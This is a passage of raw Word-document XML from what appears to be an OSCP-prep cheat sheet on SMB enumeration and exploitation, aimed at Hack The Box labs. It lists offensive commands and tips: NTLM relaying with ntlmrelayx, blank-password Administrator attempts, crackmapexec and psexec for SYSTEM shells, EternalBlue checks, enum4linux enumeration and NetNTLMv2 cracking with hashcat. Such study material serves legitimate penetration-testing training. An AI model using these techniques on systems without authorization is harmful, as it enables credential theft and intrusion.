          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-ntlmrelayx -tf targets.txt -smb2support</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pro Tips</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always try blank password for Administrator first — surprisingly common on HTB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(Pwn3d!) in crackmapexec = you have local admin — go straight for PSExec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBv1 + older Windows = always check EternalBlue before trying creds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux -a &lt;ip&gt; gives you users, groups, shares, and password policy in one shot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If you capture a NetNTLMv2 hash, crack it with: hashcat -m 5600 hash.txt rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-psexec gives SYSTEM shell — even higher than Administrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use -no-pass flag with impacket tools when password is blank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="2E75B6" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Pete Lenhart  |  OSCP Prep  |  SMB Enumeration &amp; Exploitation Cheat Sheet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5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9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2026-03-20T20:32:51.584Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-20T20:32:51.584Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>